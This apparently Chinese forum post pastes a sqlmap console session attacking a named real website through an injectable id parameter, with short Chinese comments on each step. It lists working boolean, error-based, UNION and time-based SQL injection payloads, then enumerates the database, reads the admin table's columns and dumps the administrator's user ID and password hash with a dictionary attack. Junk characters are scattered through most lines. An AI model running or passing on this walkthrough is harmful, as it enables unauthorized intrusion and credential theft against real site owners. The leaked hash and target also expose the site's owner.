D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db) }' y' r$ Z G+ `& U
ms "Mysql" --current-user /* 注解:获取当前用户名称
& v% G4 }/ w$ P6 L9 {/ L" Y; c sqlmap/0.9 - automatic SQL injection and database takeover tool
; N8 M/ G7 l$ {. K http://sqlmap.sourceforge.net starting at: 16:53:54" x% Y, T4 T {( s* i
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
! J$ h2 |( `, a0 V session file
. f8 [8 O j K9 p3 `/ i: _6 Z6 W[16:53:54] [INFO] resuming injection data from session file# u: c: l) W1 f5 I- i2 N0 ]
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
1 ]; x3 [- \! L[16:53:54] [INFO] testing connection to the target url! w" T+ `9 B5 }8 V2 F
sqlmap identified the following injection points with a total of 0 HTTP(s) reque. R; l& Z. r9 E
sts:( B% r' W# H3 a* Q: v$ u, M8 f
---8 ^3 N0 O# t# ~# T) v8 i% ?) L
Place: GET8 m1 D. |6 j2 ~, i% E# v. m
Parameter: id) m! | o; j) s
Type: boolean-based blind& r/ W. t! g' F; t
Title: AND boolean-based blind - WHERE or HAVING clause6 o. Q+ G$ U7 @3 D. G, p
Payload: id=276 AND 799=799
, O6 m3 m# R2 ~' t5 d2 w& _7 k Type: error-based
% C$ u. M& L7 ?: b- X& |2 r7 Z! O Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause+ [) J$ p5 n i$ f9 |4 n3 p
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
5 L2 f! z) n! m1 J120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,585 J% {0 h. Z3 z/ R' K l8 D
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)8 c+ ?/ u( g/ Z- g
Type: UNION query, K, n4 b! I, y
Title: MySQL UNION query (NULL) - 1 to 10 columns
* |2 |* e) C4 b8 l" C2 e) N Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
' ]9 k8 `* o2 U* g) \ }& u(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),7 \8 s8 ], s! ]
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
$ X0 g" F. v+ v. ^0 Q$ F6 W Type: AND/OR time-based blind
* Y/ e3 c0 q8 S/ j; x8 ^# i2 \ Title: MySQL > 5.0.11 AND time-based blind
$ E- Z; _& X+ @ Payload: id=276 AND SLEEP(5)
7 r( l( i5 q+ G. J3 a1 t( `! p) m---/ [! x" J! n }4 t! |, V. l+ F
[16:53:55] [INFO] the back-end DBMS is MySQL, ^* v7 Z" B& \/ }5 Y) a
web server operating system: Windows- t7 s4 j. e( f2 {3 Y" u$ k
web application technology: Apache 2.2.11, PHP 5.3.0
3 N1 `! o" X# D1 p* Q. Zback-end DBMS: MySQL 5.0
4 L# d+ [! I* Q8 J8 L9 ^[16:53:55] [INFO] fetching current user f- P; \5 E+ f) W
current user: 'root@localhost' 6 B( t+ ?( E3 g5 \* L( a4 l
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou4 u; B$ g$ T; v# e& ?6 n, h
tput\www.wepost.com.hk' shutting down at: 16:53:58
$ L% B* ]* x: a6 M$ Y: u; L
6 E4 O! B: X, Y( M9 x/ PD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db5 W, \: K1 r! m, V9 z
ms "Mysql" --current-db /*当前数据库% ^: j- d# C$ D5 m
sqlmap/0.9 - automatic SQL injection and database takeover tool. }& }4 P4 f1 O3 P% N: u
http://sqlmap.sourceforge.net starting at: 16:54:16% y% U( @, ~! [8 f" B0 ^
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as' c% B5 U) o Q
session file
# H, g7 W: { r& k! Y: L6 B[16:54:16] [INFO] resuming injection data from session file. _# Z: w% x& }$ `+ p, C, z& w" R
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file2 r4 V# f. l4 k7 F# G: c$ V
[16:54:16] [INFO] testing connection to the target url; ^" b; N- ?) Y7 r, _- b
sqlmap identified the following injection points with a total of 0 HTTP(s) reque+ K1 M% O* x' N6 n
sts:+ p, ~% K Y9 V! W, [
---
7 g) S" i1 c1 z* d! aPlace: GET4 y S( S& c& v: b4 }
Parameter: id
1 Z) J7 \7 [! T: }1 R) T, y, { Type: boolean-based blind; A9 |- ?) l1 x9 b
Title: AND boolean-based blind - WHERE or HAVING clause7 N7 \4 S9 z' q
Payload: id=276 AND 799=7994 Z/ R% T1 B& }" \, S+ {
Type: error-based; t ?, N! [. l+ U- k) }
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
9 U9 S9 e+ c9 Z8 q Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,# e& i$ D1 P7 r# F+ K% B2 z: Z) e
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
+ [5 T5 y( Z. Y),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
5 T3 X6 E8 G0 u5 T1 W$ }' R) ^: }+ y Type: UNION query
7 N# ]. o6 K# p' C v$ u Title: MySQL UNION query (NULL) - 1 to 10 columns
( m1 E. V$ B5 I0 _0 y" _ ` Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR% M% J2 H" u2 z7 H/ r" g2 Q; B
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
9 u: ?. f. _4 ^7 O" G q' mCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
, {$ K# M6 k% j! B5 B Type: AND/OR time-based blind
; i- r) G! t7 @! W Title: MySQL > 5.0.11 AND time-based blind9 K& r9 E. s" S! z9 f1 p
Payload: id=276 AND SLEEP(5)
8 j( [4 n$ n% G/ J+ W2 j---1 ^8 Z [# I, W
[16:54:17] [INFO] the back-end DBMS is MySQL& T* ~) V. C a: n
web server operating system: Windows
/ M6 a" q! D3 t6 B) l3 u* y/ y% j! Jweb application technology: Apache 2.2.11, PHP 5.3.01 D( y% R8 R3 C& T
back-end DBMS: MySQL 5.0
; a( o- U8 c% l6 c* I* L* l2 G# H[16:54:17] [INFO] fetching current database' u7 ~! T) s. w5 }% Y
current database: 'wepost'6 G, O2 h- X- G3 |
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
+ E% s2 F! L7 T% L8 A# ]6 Ltput\www.wepost.com.hk' shutting down at: 16:54:18
1 n E! i# X; E8 i* PD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
7 f8 l o; Z5 u3 i& p, L! fms "Mysql" --tables -D "wepost" /*获取当前数据库的表名: z; }* Y- t( o8 ]
sqlmap/0.9 - automatic SQL injection and database takeover tool
3 W: M9 W, ~3 L. Z! f# Q+ U+ @4 n http://sqlmap.sourceforge.net starting at: 16:55:25" B+ J( t7 E# ~2 l) Z
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
j ?7 H( N5 P" ]+ i0 p/ P7 L5 f session file
, x! E% O2 E( ?3 B[16:55:25] [INFO] resuming injection data from session file. e1 Q" G3 d$ @# l/ H" b# j
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
& j3 Z* \ B" r- g) I[16:55:25] [INFO] testing connection to the target url8 R) @) l4 o. j6 i+ D( O5 B
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
2 p4 ?! g4 f- z9 H$ b+ J: wsts:3 |/ r5 ~( w; E2 F* M9 m+ H$ L3 y# i- t
---$ ~9 L# H, Y( H, b
Place: GET8 R7 K* D1 f0 r# F7 \4 g% ~
Parameter: id$ Y! S0 ^; v7 ]
Type: boolean-based blind% f0 G, o( H" _( N' {
Title: AND boolean-based blind - WHERE or HAVING clause
3 A6 [6 _9 l7 Z; E Payload: id=276 AND 799=799% M3 g/ _5 f8 b& H
Type: error-based
: |! c. X/ C3 C t* x Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
. D% e5 Q) `& w t9 h Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,1 p7 ^; @8 T& }" D# k! u
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58. e! C8 D( H9 H
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)1 O- {/ X- _) Z8 d6 V
Type: UNION query" Z. o4 F8 f) n6 |5 t
Title: MySQL UNION query (NULL) - 1 to 10 columns
# b: C9 ?1 \( L9 _: R Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR1 \ z. I+ Q1 A1 i6 N
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
/ D/ i6 N" g& F2 j" ^( FCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
, e- d" a' w: e4 V Type: AND/OR time-based blind
3 Y! f# O$ u( m8 o Title: MySQL > 5.0.11 AND time-based blind( k& }- P* s8 @& {* {" r6 ]
Payload: id=276 AND SLEEP(5)
; v$ I! }( t' ~8 m' u---9 G# N4 I' Y, B# J# h9 J y
[16:55:26] [INFO] the back-end DBMS is MySQL$ X) W0 u- d5 M; H% y: q! o" A
web server operating system: Windows6 F) s6 |: ^2 Q% s" G& r: W
web application technology: Apache 2.2.11, PHP 5.3.00 `, \. k: E7 v' }4 e q
back-end DBMS: MySQL 5.0* A/ k: z) u0 ^7 ]) P. j% o
[16:55:26] [INFO] fetching tables for database 'wepost'
. ]( M% J8 o% l A[16:55:27] [INFO] the SQL query used returns 6 entries
$ u. A. C: a1 ADatabase: wepost: H; Q0 l2 W/ ]' [8 L, u+ N7 F7 Z
[6 tables]2 _# K u7 V7 b3 O' y
+-------------+
' X7 h6 l2 b' V( C" q c| admin |
2 N9 O! X' U1 t% i$ k| article |
+ d" K9 d2 s F; Q5 [8 q r- l| contributor |
/ L3 V" h6 L0 C8 V% @) B" b| idea |
! i; L. H1 z4 S: m% d D: s| image |2 p* }9 Z( W: ?
| issue |$ D, n6 `1 ~$ [8 w6 Q% H! v) x
+-------------+
( `' R2 h8 N, Y* q% A# i7 ]6 _[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
9 q8 m% c6 q9 q6 d$ E C6 b0 ptput\www.wepost.com.hk' shutting down at: 16:55:337 D! w8 O: w% B7 x, G) f; a+ W
8 T1 {6 e; r) l" s6 v' S
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db' `& l7 n/ i( f0 ~
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名- u8 X- O8 T& g7 Y7 H
sqlmap/0.9 - automatic SQL injection and database takeover tool
. `: y( j! M+ [7 \3 N% m* ~: ~/ p http://sqlmap.sourceforge.net starting at: 16:56:06" W4 `9 r9 w2 y' L
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
4 a4 G# L+ H* tsts:
+ c% N$ s# U r6 _( H" X---
2 e* O& m; N! J4 z5 MPlace: GET. V& p0 { p: a. T+ S5 l
Parameter: id- |0 `( I' ~( B; q& M
Type: boolean-based blind
* A! S# O4 O; U' A: l Title: AND boolean-based blind - WHERE or HAVING clause, ~: g5 q8 C) G' u: G+ z, t
Payload: id=276 AND 799=799
: t, d7 ?0 \" y z# Y Type: error-based$ j8 ^2 J; A2 x
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
! h% t; t- L8 W/ O _" F Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,, C( _8 p( X! @% v/ o) f
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,587 ?0 e% Z/ O1 [) J
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a): b$ i. [7 a5 L( I" j0 E5 ~
Type: UNION query
. h; d1 V2 j4 @$ ] Title: MySQL UNION query (NULL) - 1 to 10 columns8 p8 n9 q# F1 `, _. d
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR' }% y" m* B- S0 d/ m* y
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),0 `: _% O2 E3 P4 U# ]3 Q I8 p C; f
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#& w O+ j z8 q ~- v1 C- {
Type: AND/OR time-based blind9 c- V, M# X) M+ ]! A0 k3 `
Title: MySQL > 5.0.11 AND time-based blind. e1 q( f( M% o( r2 l
Payload: id=276 AND SLEEP(5)+ R9 u2 C% e, X( ^2 p
---4 H) r4 ~! C( Z6 q+ e0 L
web server operating system: Windows% P+ d* S! J2 n
web application technology: Apache 2.2.11, PHP 5.3.0
. X% o2 f) z# e1 F6 bback-end DBMS: MySQL 5.0( p! v( T# n% C4 a
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
/ Y9 I2 ?3 v7 J1 s! cssion': wepost, wepost
( l7 Q0 R) \* y- u9 s! L4 q7 uDatabase: wepost
6 Q& |1 E8 l% [- x8 j7 `: k& rTable: admin+ E4 E6 q3 d4 ?& Z4 E
[4 columns]8 V3 i7 \2 p7 X9 A
+----------+-------------+
0 [' g& y, B/ Q: r* o| Column | Type |. K1 K& l8 T5 u9 C3 p' a# l( B
+----------+-------------+
5 J1 I* a; X1 z8 `% u. z| id | int(11) |: B5 U/ S7 u" ~7 H+ Y% w+ L
| password | varchar(32) |5 m& k* ?/ W @5 U9 d& g
| type | varchar(10) |
6 u4 E- o0 v E! t+ i3 `- C* ]$ E| userid | varchar(20) |
8 G: r$ C' w: A4 ~, L" a, ` u, i7 B+----------+-------------+
7 J8 A, j) k5 a, \9 |( u shutting down at: 16:56:19
) K* e- r3 B9 ]- C6 Z& Q: y, ]% R" P9 Q# B& U. O
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db$ y, y5 y: M5 N
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
C2 K: \# K; x sqlmap/0.9 - automatic SQL injection and database takeover tool
! Z" `" G- X" l http://sqlmap.sourceforge.net starting at: 16:57:14
5 q- L" \0 ]' p' I# C) R1 X3 f9 {sqlmap identified the following injection points with a total of 0 HTTP(s) reque
# {, B- l$ ]0 Q; `( @/ A, msts:& q; f* F0 D/ a# f1 a
---
2 F7 K D) `: U( Y) vPlace: GET+ M+ Y/ G( j# |+ W
Parameter: id) y0 A9 D5 k& h* r. ^
Type: boolean-based blind
" Z- k" F* B3 b$ K6 o7 @ Title: AND boolean-based blind - WHERE or HAVING clause
6 J) q) [7 ]1 _! A+ ] Payload: id=276 AND 799=799
5 s/ X @; _6 D6 Q Type: error-based0 ^ e! ]9 Y% _$ P6 g
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause# n% y$ S" w+ U) @2 v: C/ w0 @9 r
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,; d, H! `1 y( y& q" F3 s
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
* x$ n5 \. K) F* [),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
2 ^) B9 E6 N/ j3 ^ Type: UNION query
0 _6 S. t2 R6 m1 z Title: MySQL UNION query (NULL) - 1 to 10 columns
; e# i. N/ c( M" { Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR+ M9 m& o- J: v) ]( T
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),* n8 X* p. z' e; l- ]4 O
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#. u) y1 B) C& x2 X' o
Type: AND/OR time-based blind0 M* O. G3 ^/ }2 M4 C
Title: MySQL > 5.0.11 AND time-based blind, |, c# ]& ?+ B3 |0 S# P) u
Payload: id=276 AND SLEEP(5). I" ?0 F" k9 _
---
: N( m! L& c) c9 H. @/ Z9 U% e. Pweb server operating system: Windows
m% n4 \# A) e7 w5 [web application technology: Apache 2.2.11, PHP 5.3.0+ T9 X& b) P6 [, A. B" H
back-end DBMS: MySQL 5.09 z! F6 R0 j8 b. ]* o
recognized possible password hash values. do you want to use dictionary attack o
( `' m4 a7 R0 t) Nn retrieved table items? [Y/n/q] y# o9 c2 Q7 J0 [* h& p
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]5 z5 j3 a% l7 ^( q7 l4 f5 @, Z
do you want to use common password suffixes? (slow!) [y/N] y. F9 |# v9 U3 Q% y# y. M1 \
Database: wepost( r* i; h A( @
Table: admin4 p( |, `2 S9 F* v4 w, L: w5 i" d
[1 entry]
: K$ t$ F! b1 Q+ w# z+----------------------------------+------------+
5 o ^& a$ d" R* _2 X! L| password | userid |8 j0 b% M$ Z' I# F0 v
+----------------------------------+------------+
% H. W7 S" m+ F# `6 a1 N, u| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
" F& V7 E- K, L- M: B+----------------------------------+------------+
# [7 c7 v/ }) r2 q. J( {' @2 U$ v shutting down at: 16:58:14
( u, \- w( R6 D1 t8 [. C. e* y
# T; B q0 W& n3 A% n4 eD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对